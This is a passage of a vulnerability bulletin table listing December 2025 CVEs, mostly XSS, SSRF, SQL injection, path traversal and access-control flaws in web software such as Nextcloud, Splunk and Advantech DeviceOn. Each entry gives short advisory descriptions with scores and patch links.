| xerrors--Yuxi-Know | A vulnerability was detected in xerrors Yuxi-Know up to 0.4.0. This vulnerability affects the function OtherEmbedding.aencode of the file /src/models/embed.py. Performing manipulation of the argument health_url results in server-side request forgery. The attack can be initiated remotely. The exploit is now public and may be used. The patch is named 0ff771dc1933d5a6b78f804115e78a7d8625c3f3. To fix this issue, it is recommended to deploy a patch. The vendor responded with a vulnerability confirmation and a list of security measures they have established already (e.g. disabled URL parsing, disabled URL upload mode, removed URL-to-markdown conversion). | 2025-12-05 | 4.7 | CVE-2025-14116 | VDB-334492 | xerrors Yuxi-Know embed.py OtherEmbedding.aencode server-side request forgery VDB-334492 | CTI Indicators (IOB, IOC, IOA) Submit #697380 | xerrors Yuxi-Know Yuxi-Know ≤ 0.4.0 Server-Side Request Forgery https://www.notion.so/SSRF-vulnerablity-in-Yuxi-Know-2afea92a3c4180bea524f1a253f8d9a0?source=copy_link https://github.com/xerrors/Yuxi-Know/commit/0ff771dc1933d5a6b78f804115e78a7d8625c3f3 |
| yhirose--cpp-httplib | cpp-httplib is a C++11 single-file header-only cross platform HTTP/HTTPS library. Prior to 0.27.0, a vulnerability allows attacker-controlled HTTP headers to influence server-visible metadata, logging, and authorization decisions. An attacker can supply X-Forwarded-For or X-Real-IP headers which get accepted unconditionally by get_client_ip() in docker/main.cc, causing access and error logs (nginx_access_logger / nginx_error_logger) to record spoofed client IPs (log poisoning / audit evasion). This vulnerability is fixed in 0.27.0. | 2025-12-05 | 5.3 | CVE-2025-66577 | https://github.com/yhirose/cpp-httplib/security/advisories/GHSA-gfpf-r66f-5mh2 https://github.com/yhirose/cpp-httplib/commit/ac9ebb0ee333ce8bf13523f487bdfad9518a2aff |
| Yohann0617--oci-helper | A weakness has been identified in Yohann0617 oci-helper up to 3.2.4. This issue affects the function addCfg of the file src/main/java/com/yohann/ocihelper/service/impl/OciServiceImpl.java of the component OCI Configuration Upload. Executing manipulation of the argument File can lead to path traversal. It is possible to launch the attack remotely. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-02 | 6.3 | CVE-2025-13875 | VDB-334031 | Yohann0617 oci-helper OCI Configuration Upload OciServiceImpl.java addCfg path traversal VDB-334031 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #692125 | yohann( https://github.com/Yohann0617 ) oci-helper <=V3.2.4 Directory/Path Traversal https://github.com/Xzzz111/exps/blob/main/archives/oci-helper-path-traversal-1/report.md https://github.com/Xzzz111/exps/blob/main/archives/oci-helper-path-traversal-1/report.md#proof-of-concept |
| Yonyou--U8 Cloud | A vulnerability was identified in Yonyou U8 Cloud 5.0/5.0sp/5.1/5.1sp. The affected element is an unknown function of the file nc/pubitf/erm/mobile/appservice/AppServletService.class. Such manipulation of the argument usercode leads to sql injection. The attack may be launched remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-07 | 6.3 | CVE-2025-14185 | VDB-334605 | Yonyou U8 Cloud AppServletService.class sql injection VDB-334605 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #698601 | Yonyou Network Technology Co., Ltd. U8 Cloud 5.0,5.0sp,5.1,5.1sp SQL Injection https://github.com/798xuezhiqian-collab/vuln01 |
| youlaitech--youlai-mall | A flaw has been found in youlaitech youlai-mall 1.0.0/2.0.0. Affected is the function getById/updateAddress/deleteAddress of the file /mall-ums/app-api/v1/addresses/. Executing manipulation can lead to improper control of dynamically-identified variables. The attack can be executed remotely. The exploit has been published and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-04 | 6.3 | CVE-2025-14051 | VDB-334367 | youlaitech youlai-mall addresses deleteAddress improper control of dynamically-identified variables VDB-334367 | CTI Indicators (IOB, IOC, IOA) Submit #694827 | youlai-mall latest Improper Control of Resource Identifiers Submit #694836 | youlai-mall latest Improper Control of Resource Identifiers (Duplicate) Submit #694837 | youlai-mall latest Improper Control of Resource Identifiers (Duplicate) https://github.com/Hwwg/cve/issues/18 https://github.com/Hwwg/cve/issues/19 |
| youlaitech--youlai-mall | A vulnerability has been found in youlaitech youlai-mall 1.0.0/2.0.0. Affected by this vulnerability is the function getMemberById of the file /mall-ums/app-api/v1/members/. The manipulation of the argument memberId leads to improper access controls. The attack is possible to be carried out remotely. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-05 | 6.3 | CVE-2025-14052 | VDB-334368 | youlaitech youlai-mall members getMemberById access control VDB-334368 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #694854 | youlai-mall latest Improper Control of Resource Identifiers https://github.com/Hwwg/cve/issues/21 |
| youlaitech--youlai-mall | A vulnerability has been found in youlaitech youlai-mall 1.0.0/2.0.0. This impacts an unknown function of the file /app-api/v1/orders/. The manipulation of the argument orderId leads to improper control of dynamically-identified variables. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-05 | 6.3 | CVE-2025-14085 | VDB-334476 | youlaitech youlai-mall orders improper control of dynamically-identified variables VDB-334476 | CTI Indicators (IOB, IOC, IOA) Submit #695943 | youlai-mall latest Improper Control of Resource Identifiers https://github.com/Hwwg/cve/issues/23 |
| youlaitech--youlai-mall | A vulnerability was found in youlaitech youlai-mall 1.0.0/2.0.0. Affected is an unknown function of the file /app-api/v1/members/openid/. The manipulation of the argument openid results in improper access controls. The attack can be executed remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-05 | 6.3 | CVE-2025-14086 | VDB-334477 | youlaitech youlai-mall openid access control VDB-334477 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #695945 | youlai-mall latest Improper Control of Resource Identifiers https://github.com/Hwwg/cve/issues/25 |
Low Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| alokjaiswal--Hotel-Management-services-using-MYSQL-and-php | A vulnerability has been found in alokjaiswal Hotel-Management-services-using-MYSQL-and-php up to 5f8b60a7aa6c06a5632de569d4e3f6a8cd82f76f. Affected is an unknown function of the file /usersub.php of the component Request Pending Page. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. This product is using a rolling release to provide continious delivery. Therefore, no version details for affected nor updated releases are available. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-07 | 3.5 | CVE-2025-14200 | VDB-334620 | alokjaiswal Hotel-Management-services-using-MYSQL-and-php Request Pending usersub.php cross site scripting VDB-334620 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #699993 | Hotel-Management-services-using-MYSQL-and-php web web 1 xxs vnlerability https://github.com/Yh276/h0202/blob/main/Hotel-Management-services-using-MYSQL-and-php%20web%202xxs.docx |
| alokjaiswal--Hotel-Management-services-using-MYSQL-and-php | A vulnerability was found in alokjaiswal Hotel-Management-services-using-MYSQL-and-php up to 5f8b60a7aa6c06a5632de569d4e3f6a8cd82f76f. Affected by this vulnerability is an unknown functionality of the file /dishsub.php. The manipulation of the argument item.name results in cross site scripting. It is possible to launch the attack remotely. The exploit has been made public and could be used. This product takes the approach of rolling releases to provide continious delivery. Therefore, version details for affected and updated releases are not available. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-07 | 2.4 | CVE-2025-14201 | VDB-334621 | alokjaiswal Hotel-Management-services-using-MYSQL-and-php dishsub.php cross site scripting VDB-334621 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #699994 | Hotel-Management-services-using-MYSQL-and-php web 1 web 1 XSS vulnerability https://github.com/Yh276/h0202/blob/main/Hotel-Management-services-using-MYSQL-and-php%20web%201%20xxs.docx |
| code-projects--Chamber of Commerce Membership Management System | A vulnerability was found in code-projects Chamber of Commerce Membership Management System 1.0. Impacted is an unknown function of the file /membership_profile.php of the component Your Info Handler. Performing manipulation of the argument Full Name/Address/City/State results in cross site scripting. The attack is possible to be carried out remotely. The exploit has been made public and could be used. | 2025-12-07 | 2.4 | CVE-2025-14205 | VDB-334648 | code-projects Chamber of Commerce Membership Management System Your Info membership_profile.php cross site scripting VDB-334648 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #700421 | code-projects Chamber of Commerce Membership Management System In PHP With Source Code V1.0 Improper Neutralization of Alternate XSS Syntax https://www.yuque.com/u42535181/pm5nde/ky49h1xg6si9d3m8#zdDXX https://code-projects.org/ |
| code-projects--Employee Profile Management System | A vulnerability was identified in code-projects Employee Profile Management System 1.0. This issue affects some unknown processing of the file /view_personnel.php. The manipulation of the argument per_address/dr_school/other_school leads to cross site scripting. The attack may be initiated remotely. The exploit is publicly available and might be used. | 2025-12-07 | 3.5 | CVE-2025-14194 | VDB-334614 | code-projects Employee Profile Management System view_personnel.php cross site scripting VDB-334614 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #699246 | code-projects Employee Profile Management System published November 15, 2025 Cross Site Scripting https://github.com/shenxianyuguitian/employee-management-XSS https://code-projects.org/ |
| dayrui--XunRuiCMS | A security vulnerability has been detected in dayrui XunRuiCMS up to 4.7.1. Affected by this issue is some unknown functionality of the file /admind45f74adbd95.php?c=field&m=add&rname=site&rid=1&page=1 of the component Add Data Validation Page. The manipulation of the argument data[name] leads to cross site scripting. The attack is possible to be carried out remotely. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-04 | 3.5 | CVE-2025-14006 | VDB-334248 | dayrui XunRuiCMS Add Data Validation admind45f74adbd95.php cross site scripting VDB-334248 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #692910 | Sichuan Xunrui Cloud Software Development Co., Ltd xunruicms <=4.7.1 Cross-Site Scripting https://github.com/24-2021/vul/blob/main/xunruicms-Data%20Validation-XSS/xunruicms-Data%20Validation-XSS.md |
| dayrui--XunRuiCMS | A weakness has been identified in dayrui XunRuiCMS up to 4.7.1. Affected by this vulnerability is an unknown functionality of the file /admind45f74adbd95.php?c=field&m=add&rname=site&rid=1&page=0 of the component Add Display Name Field. Executing manipulation of the argument data[name] can lead to cross site scripting. The attack can be executed remotely. The exploit has been made available to the public and could be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-04 | 2.4 | CVE-2025-14005 | VDB-334247 | dayrui XunRuiCMS Add Display Name Field admind45f74adbd95.php cross site scripting VDB-334247 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #692909 | Sichuan Xunrui Cloud Software Development Co., Ltd xunruicms <=4.7.1 Cross-Site Scripting https://github.com/24-2021/vul/blob/main/xunruicms-Basic%20Settings-XSS/xunruicms-Basic%20Settings-XSS.md |
| dayrui--XunRuiCMS | A vulnerability was detected in dayrui XunRuiCMS up to 4.7.1. This affects an unknown part of the file /admin79f2ec220c7e.php?c=api&m=demo&name=mobile of the component Domain Name Binding Page. The manipulation results in cross site scripting. The attack may be performed from remote. A high complexity level is associated with this attack. It is indicated that the exploitability is difficult. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-04 | 2 | CVE-2025-14007 | VDB-334249 | dayrui XunRuiCMS Domain Name Binding admin79f2ec220c7e.php cross site scripting VDB-334249 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #692914 | Sichuan Xunrui Cloud Software Development Co., Ltd xunruicms <=4.7.1 URL redirection causing remote XSS https://github.com/24-2021/vul/blob/main/xunruicms-site_domain%2Bmobile_demo-URL%20redirection%20causing%20remote%20XSS/xunruicms-site_domain%2Bmobile_demo-URL%20redirection%20causing%20remote%20XSS.md |
| envoyproxy--envoy | Envoy is a high-performance edge/middle/service proxy. In 1.33.12, 1.34.10, 1.35.6, 1.36.2, and earlier, when Envoy is configured in TCP proxy mode to handle CONNECT requests, it accepts client data before issuing a 2xx response and forwards that data to the upstream TCP connection. If a forwarding proxy upstream from Envoy then responds with a non-2xx status, this can cause a de-synchronized CONNECT tunnel state. By default Envoy continues to allow early CONNECT data to avoid disrupting existing deployments. The envoy.reloadable_features.reject_early_connect_data runtime flag can be set to reject CONNECT requests that send data before a 2xx response when intermediaries upstream from Envoy may reject establishment of a CONNECT tunnel. | 2025-12-03 | 3.7 | CVE-2025-64763 | https://github.com/envoyproxy/envoy/security/advisories/GHSA-rj35-4m94-77jh |
| Grandstream--GXP1625 | A security flaw has been discovered in Grandstream GXP1625 1.0.7.4. The impacted element is an unknown function of the file /cgi-bin/api.values.post of the component Network Status Page. Performing manipulation of the argument vpn_ip results in basic cross site scripting. Remote exploitation of the attack is possible. The exploit has been released to the public and may be exploited. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-07 | 3.5 | CVE-2025-14186 | VDB-334606 | Grandstream GXP1625 Network Status api.values.post cross site scripting VDB-334606 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #698650 | Grandstream GXP1625 1.0.7.4 xss https://drive.google.com/file/d/1rsskCaj4TwiaGG9_VYabjnKMP_zAry7L/view?usp=sharing |
| hedgedoc--hedgedoc | HedgeDoc is an open source, real-time, collaborative, markdown notes application. Prior to 1.10.4, some of HedgeDoc's OAuth2 endpoints for social login providers such as Google, GitHub, GitLab, Facebook or Dropbox lack CSRF protection, since they don't send a state parameter and verify the response using this parameter. This vulnerability is fixed in 1.10.4. | 2025-12-05 | 3.7 | CVE-2025-66629 | https://github.com/hedgedoc/hedgedoc/security/advisories/GHSA-6wm6-3vpq-6qvv https://github.com/hedgedoc/hedgedoc/commit/35f36fccba941ed8029ee222f7d2a5df17b42e2b |
| Mattermost--Mattermost | Mattermost versions 10.11.x <= 10.11.4, 10.5.x <= 10.5.12 fail to validate the user permission when accessing the files and subscribing to the block in Boards, which allows an authenticated user to access other board files and was able to subscribe to the block from other boards that the user does not have access to | 2025-12-02 | 3.1 | CVE-2025-13870 | https://mattermost.com/security-updates |
| Medtronic--CareLink Network | Insecure Direct Object Reference vulnerability in Medtronic CareLink Network which allows an authenticated attacker with access to specific device and user information to submit web requests to an API endpoint that would expose sensitive user information. This issue affects CareLink Network: before December 4, 2025. | 2025-12-04 | 2.2 | CVE-2025-12997 | https://www.medtronic.com/en-us/e/product-security/security-bulletins/carelink-network-vulnerabilities.html |
| n/a--JIZHICMS | A vulnerability was identified in JIZHICMS up to 2.5.5. The impacted element is an unknown function of the file /index.php/admins/Comment/addcomment.html of the component Comment Handler. The manipulation of the argument body leads to cross site scripting. The attack may be initiated remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-04 | 2.4 | CVE-2025-14013 | VDB-334254 | JIZHICMS Comment addcomment.html cross site scripting VDB-334254 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #694649 | Langfang Extreme Network Technology Co., Ltd jizhicms <=2.5.5 Storage XSS https://github.com/24-2021/vul2/blob/main/jizhicms%3DV2.5.5-Commentaddcomment.html-bodyparameter-Storage%20XSS/jizhicms%3DV2.5.5-Commentaddcomment.html-bodyparameter-Storage%20XSS.md |
| nextcloud--security-advisories | Nextcloud Mail is the mail app for Nextcloud, a self-hosted productivity platform. Prior to 5.5.3, a stored HTML injection in the Mail app's message list allowed an authenticated user to inject HTML into the email subjects. Javascript was correctly blocked by the content security policy of the Nextcloud Server code. | 2025-12-05 | 3.5 | CVE-2025-66514 | https://github.com/nextcloud/security-advisories/security/advisories/GHSA-v394-8gpc-6fv5 https://github.com/nextcloud/mail/pull/11740 https://github.com/nextcloud/mail/commit/c64fcc3b79e0c089b5e1d2e04a07bfa740b2ac09 https://hackerone.com/reports/3357036 |
| nextcloud--security-advisories | Nextcloud Groupfolders provides admin-configured folders shared by everyone in a group or team. Prior to 14.0.11, 15.3.12, 16.0.15, 17.0.14, 18.1.8, 19.1.8, and 20.1.2, a user with read-only permission can restore a file from the trash bin. This vulnerability is fixed in 14.0.11, 15.3.12, 16.0.15, 17.0.14, 18.1.8, 19.1.8, and 20.1.2. | 2025-12-05 | 3.5 | CVE-2025-66545 | https://github.com/nextcloud/security-advisories/security/advisories/GHSA-2vrq-fhmf-c49m https://github.com/nextcloud/groupfolders/issues/4041 https://github.com/nextcloud/groupfolders/pull/4076 https://github.com/nextcloud/groupfolders/commit/bbe87ebed8da23e9df4db637a76fbc8d36439d58 |
| nextcloud--security-advisories | Nextcloud Calendar is a calendar app for Nextcloud. Prior to 4.7.19, 5.5.6, and 6.0.1, the calendar app allowed blindly booking appointments with a squential ID without known the appointment token. This vulnerability is fixed in 4.7.19, 5.5.6, and 6.0.1. | 2025-12-05 | 3.3 | CVE-2025-66546 | https://github.com/nextcloud/security-advisories/security/advisories/GHSA-7x2j-2674-fj95 https://github.com/nextcloud/calendar/pull/7537 https://github.com/nextcloud/calendar/commit/f41650c3681fc4a4130eb883f5c0899c011326b3 https://hackerone.com/reports/3275810 |
| nextcloud--security-advisories | Nextcloud Deck is a kanban style organization tool aimed at personal planning and project organization for teams integrated with Nextcloud. Prior to 1.12.7, 1.14.4, and 1.15.1, file extension can be spoofed by using RTLO characters, tricking users into download files with a different extension than what is displayed. This vulnerability is fixed in 1.12.7, 1.14.4, and 1.15.1. | 2025-12-05 | 3.3 | CVE-2025-66548 | https://github.com/nextcloud/security-advisories/security/advisories/GHSA-xjvq-xvr7-xpg6 https://github.com/nextcloud/deck/pull/6671 https://github.com/nextcloud/deck/commit/afa95d3c507465b9d31af7c88c69b76711ef185a https://hackerone.com/reports/2326618 |
| nextcloud--security-advisories | Contacts app for Nextcloud easily syncs contacts from various devices with your Nextcloud and allows editing. Prior to 5.5.4, 6.0.6, and 7.2.5, a malicious user was able to modify their organisation and title field to load additional CSS files. Javascript and other options were correctly blocked by the content security policy of the Nextcloud Server code. This vulnerability is fixed in 5.5.4, 6.0.6, and 7.2.5. | 2025-12-05 | 3.5 | CVE-2025-66554 | https://github.com/nextcloud/security-advisories/security/advisories/GHSA-9v78-cpfc-v6h2 https://github.com/nextcloud/contacts/pull/4619 https://github.com/nextcloud/contacts/commit/d954d098978dde1f121600e8b994e02f293c68b1 https://hackerone.com/reports/3293290 |
| nextcloud--security-advisories | Nextcloud talk is a video & audio conferencing app for Nextcloud. Prior to 20.1.8 and 21.1.2, a participant with chat permissions was able to delete poll drafts of other participants within the conversation based on their numeric ID. This vulnerability is fixed in 20.1.8 and 21.1.2. | 2025-12-05 | 3.5 | CVE-2025-66556 | https://github.com/nextcloud/security-advisories/security/advisories/GHSA-pr9f-vqgg-m2jh https://github.com/nextcloud/spreed/pull/15532 https://github.com/nextcloud/spreed/commit/bd68e80d1dea98d84c1d621c2c681238cf041725 https://hackerone.com/reports/3247386 |
| nextcloud--security-advisories | Nextcloud Twofactor WebAuthn is the WebAuthn Two-Factor Provider for Nextcloud. Prior to 1.4.2 and 2.4.1, a missing ownership check allowed an attack to take-away a 2FA webauthn device when correctly guessing a 80-128 character long random string of letters, numbers and symbols. The victim would then be prompted to register a new device on the next login. The attacker can not authenticate as the victim. This vulnerability is fixed in 1.4.2 and 2.4.1. | 2025-12-05 | 3.1 | CVE-2025-66558 | https://github.com/nextcloud/security-advisories/security/advisories/GHSA-fr8x-mvjg-wf9q https://github.com/nextcloud/twofactor_webauthn/pull/881 https://github.com/nextcloud/twofactor_webauthn/commit/5d2302166d31ee2e01b2e21556bd5372156da13d https://hackerone.com/reports/3360354 |
| nextcloud--security-advisories | The Nextcloud Approval app allows approval or disapproval of files in the sidebar. Prior to 1.3.1 and 2.5.0, an authenticated user listed as a requester in a workflow can set another user's file into the "pending approval" without access to the file by using the numeric file id. This vulnerability is fixed in 1.3.1 and 2.5.0. | 2025-12-05 | 2.7 | CVE-2025-66515 | https://github.com/nextcloud/security-advisories/security/advisories/GHSA-q26g-fmjq-x5g5 https://github.com/nextcloud/approval/pull/334 https://github.com/nextcloud/approval/commit/e30b56b7832255311ac800b7875f44866e88fff4 https://hackerone.com/reports/3338748 |
| nextcloud--security-advisories | Nextcloud Desktop is the desktop sync client for Nextcloud. Prior to 3.16.5, when trying to manually lock a file inside an end-to-end encrypted directory, the path of the file was sent to the server unencrypted, making it possible for administrators to see it in log files. This vulnerability is fixed in 3.16.5. | 2025-12-05 | 2.4 | CVE-2025-66549 | https://github.com/nextcloud/security-advisories/security/advisories/GHSA-h9xj-qh76-q3hw https://github.com/nextcloud/desktop/pull/8330 https://github.com/nextcloud/desktop/commit/36d6c234d42b06a6f2e9de3e413a5c3c625edad6 https://hackerone.com/reports/3159877 |
| nutzam--NutzBoot | A weakness has been identified in nutzam NutzBoot up to 2.6.0-SNAPSHOT. This affects the function getInputStream of the file nutzcloud/nutzcloud-literpc/src/main/java/org/nutz/boot/starter/literpc/impl/endpoint/http/HttpServletRpcEndpoint.java of the component LiteRpc-Serializer. Executing manipulation can lead to deserialization. The attack may be launched remotely. This attack is characterized by high complexity. The exploitability is reported as difficult. The exploit has been made available to the public and could be exploited. | 2025-12-01 | 3.7 | CVE-2025-13805 | VDB-333815 | nutzam NutzBoot LiteRpc-Serializer HttpServletRpcEndpoint.java getInputStream deserialization VDB-333815 | CTI Indicators (IOB, IOC, IOA) Submit #692053 | Nutz Framework NutzBoot 2.6.0-SNAPSHOT Code Execution (Unauthenticated Java Deserialization) https://github.com/Xzzz111/exps/blob/main/archives/nutzboot-RCE-1/report.md https://github.com/Xzzz111/exps/blob/main/archives/nutzboot-RCE-1/report.md#vulnerability-details-and-poc |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.0.2, 9.4.6, 9.3.8, and 9.2.10, and Splunk Cloud Platform versions below 10.1.2507.10, 10.0.2503.8, and 9.3.2411.120, a low-privileged user that does not hold the "admin" or "power" Splunk roles could create a views dashboard with a custom background using the `data:image/png;base64` protocol that could potentially lead to an unvalidated redirect. This behavior circumvents the Splunk external URL warning mechanism by using a specially crafted URL, allowing for a redirection to an external malicious site. The vulnerability requires the attacker to phish the victim by tricking them into initiating a request within their browser. The authenticated user should not be able to exploit the vulnerability at will. | 2025-12-03 | 3.5 | CVE-2025-20382 | https://advisory.splunk.com/advisories/SVD-2025-1201 |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.0.2, 9.4.6, 9.3.8, and 9.2.10, and Splunk Cloud Platform versions below 10.1.2507.6, 10.0.2503.7, and 9.3.2411.117, a user who holds a role with a high privilege capability `admin_all_objects` could craft a malicious payload through the href attribute of an anchor tag within a collection in the navigation bar, which could result in execution of unauthorized JavaScript code in the browser of a user. | 2025-12-03 | 2.4 | CVE-2025-20385 | https://advisory.splunk.com/advisories/SVD-2025-1204 |
| Splunk--Splunk Enterprise | In Splunk Enterprise versions below 10.0.1, 9.4.6, 9.3.8, and 9.2.10, and Splunk Cloud Platform versions below 10.1.2507.4, 10.0.2503.7, and 9.3.2411.116, a user who holds a role that contains the high privilege capability `change_authentication` could enumerate internal IP addresses and network ports when adding new search peers to a Splunk search head in a distributed environment. | 2025-12-03 | 2.7 | CVE-2025-20388 | https://advisory.splunk.com/advisories/SVD-2025-1207 |
Severity Not Yet Assigned
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| Advantech Co., Ltd.--WISE-DeviceOn Server | Advantech WISE-DeviceOn Server versions prior to 5.4 contain a hard-coded cryptographic key vulnerability. The product uses a static HS512 HMAC secret for signing EIRMMToken JWTs across all installations. The server accepts forged JWTs that need only contain a valid email claim, allowing a remote unauthenticated attacker to generate arbitrary tokens and impersonate any DeviceOn account, including the root super admin. Successful exploitation permits full administrative control of the DeviceOn instance and can be leveraged to execute code on managed agents through DeviceOn's remote management features. | 2025-12-05 | not yet calculated | CVE-2025-34256 | https://advcloudfiles.advantech.com/cms/2ca1b071-fd78-4d7f-8a2a-7b4537a95d19/Security%20Advisory%20PDF%20File/SECURITY-ADVISORY----DeviceOn.pdf https://docs.deviceon.advantech.com/docs/resource/ https://www.vulncheck.com/advisories/advantech-wise-deviceon-server-hardcoded-jwt-key-authentication-bypass |
| Advantech Co., Ltd.--WISE-DeviceOn Server | Advantech WISE-DeviceOn Server versions prior to 5.4 contain a stored cross-site scripting (XSS) vulnerability in the /rmm/v1/action/defined endpoint. When an authenticated user creates a task, the defined_name value is stored and later rendered in the Overview page without HTML sanitization. An attacker can inject malicious script into defined_name, which is then executed in the browser context of users who view the affected task, potentially enabling session compromise and unauthorized actions as the victim. | 2025-12-05 | not yet calculated | CVE-2025-34257 | https://advcloudfiles.advantech.com/cms/2ca1b071-fd78-4d7f-8a2a-7b4537a95d19/Security%20Advisory%20PDF%20File/SECURITY-ADVISORY----DeviceOn.pdf https://docs.deviceon.advantech.com/docs/resource/ https://www.vulncheck.com/advisories/advantech-wise-deviceon-server-authenticated-stored-xss-via-action-defined |
| Advantech Co., Ltd.--WISE-DeviceOn Server | Advantech WISE-DeviceOn Server versions prior to 5.4 contain a stored cross-site scripting (XSS) vulnerability in the /rmm/v1/devicemap/plan endpoint. When an authenticated user adds an area to a map entry, the name parameter is stored and later rendered in the map list without HTML sanitization. An attacker can inject malicious script into the area name, which is then executed in the browser context of users who view or interact with the affected map entry, potentially enabling session compromise and unauthorized actions as the victim. | 2025-12-05 | not yet calculated | CVE-2025-34258 | https://advcloudfiles.advantech.com/cms/2ca1b071-fd78-4d7f-8a2a-7b4537a95d19/Security%20Advisory%20PDF%20File/SECURITY-ADVISORY----DeviceOn.pdf https://docs.deviceon.advantech.com/docs/resource/ https://www.vulncheck.com/advisories/advantech-wise-deviceon-server-authenticated-stored-xss-via-devicemap-plan |
| Advantech Co., Ltd.--WISE-DeviceOn Server | Advantech WISE-DeviceOn Server versions prior to 5.4 contain a stored cross-site scripting (XSS) vulnerability in the /rmm/v1/devicemap/building endpoint. When an authenticated user creates a map entry, the name parameter is stored and later rendered in the map list UI without HTML sanitzation. An attacker can inject malicious script into the map entry name, which is then executed in the browser context of users who view or interact with the affected map entry, potentially enabling session compromise and unauthorized actions as the victim. | 2025-12-05 | not yet calculated | CVE-2025-34259 | https://advcloudfiles.advantech.com/cms/2ca1b071-fd78-4d7f-8a2a-7b4537a95d19/Security%20Advisory%20PDF%20File/SECURITY-ADVISORY----DeviceOn.pdf https://docs.deviceon.advantech.com/docs/resource/ https://www.vulncheck.com/advisories/advantech-wise-deviceon-server-authenticated-stored-xss-via-devicemap-building |
| Advantech Co., Ltd.--WISE-DeviceOn Server | Advantech WISE-DeviceOn Server versions prior to 5.4 contain a stored cross-site scripting (XSS) vulnerability in the /rmm/v1/action/schedule endpoint. When an authenticated user adds a schedule to an existing task, the schedule name is stored and later rendered in schedule listings without HTML sanitation. An attacker can inject malicious script into the schedule name, which is then executed in the browser context of users who view or interact with the affected schedule, potentially enabling session compromise and unauthorized actions as the victim. | 2025-12-05 | not yet calculated | CVE-2025-34260 | https://advcloudfiles.advantech.com/cms/2ca1b071-fd78-4d7f-8a2a-7b4537a95d19/Security%20Advisory%20PDF%20File/SECURITY-ADVISORY----DeviceOn.pdf https://docs.deviceon.advantech.com/docs/resource/ https://www.vulncheck.com/advisories/advantech-wise-deviceon-server-authenticated-stored-xss-via-action-schedule |
| Advantech Co., Ltd.--WISE-DeviceOn Server | Advantech WISE-DeviceOn Server versions prior to 5.4 contain a stored cross-site scripting (XSS) vulnerability in the /rmm/v1/devicegroups/ endpoint. When an authenticated user creates a device group, the name and description values are stored and later rendered in device group listings without proper HTML sanitation. An attacker can inject malicious script into either field, which is then executed in the browser context of users who view or interact with the affected device group, potentially enabling session compromise and unauthorized actions as the victim. | 2025-12-05 | not yet calculated | CVE-2025-34261 | https://advcloudfiles.advantech.com/cms/2ca1b071-fd78-4d7f-8a2a-7b4537a95d19/Security%20Advisory%20PDF%20File/SECURITY-ADVISORY----DeviceOn.pdf https://docs.deviceon.advantech.com/docs/resource/ https://www.vulncheck.com/advisories/advantech-wise-deviceon-server-authenticated-stored-xss-via-devicegroups |
| Advantech Co., Ltd.--WISE-DeviceOn Server | Advantech WISE-DeviceOn Server versions prior to 5.4 contain a stored cross-site scripting (XSS) vulnerability in the /rmm/v1/devices/name/{agent_id} endpoint. When an authenticated user renames a device, the new_name value is stored and later rendered in device listings or detail views without proper HTML sanitation. An attacker can inject malicious script into the device name, which is then executed in the browser context of users who view or interact with the affected device, potentially enabling session compromise and unauthorized actions as the victim. | 2025-12-05 | not yet calculated | CVE-2025-34262 | https://advcloudfiles.advantech.com/cms/2ca1b071-fd78-4d7f-8a2a-7b4537a95d19/Security%20Advisory%20PDF%20File/SECURITY-ADVISORY----DeviceOn.pdf https://docs.deviceon.advantech.com/docs/resource/ https://www.vulncheck.com/advisories/advantech-wise-deviceon-server-authenticated-stored-xss-via-devices-name-agentid |
| Advantech Co., Ltd.--WISE-DeviceOn Server | Advantech WISE-DeviceOn Server versions prior to 5.4 contain a stored cross-site scripting (XSS) vulnerability in the /rmm/v1/plugin-config/dashboards/menus endpoint. When an authenticated user adds or edits a dashboard entry, the label and path values are stored in plugin configuration data and later rendered in the dashboard UI without proper HTML sanitation. An attacker can inject malicious script into either field, which is then executed in the browser context of users who view or interact with the affected dashboard, potentially enabling session compromise and unauthorized actions as the victim. | 2025-12-05 | not yet calculated | CVE-2025-34263 | https://advcloudfiles.advantech.com/cms/2ca1b071-fd78-4d7f-8a2a-7b4537a95d19/Security%20Advisory%20PDF%20File/SECURITY-ADVISORY----DeviceOn.pdf https://docs.deviceon.advantech.com/docs/resource/ https://www.vulncheck.com/advisories/advantech-wise-deviceon-server-authenticated-stored-xss-via-pluginconfig-dashboards-menus |
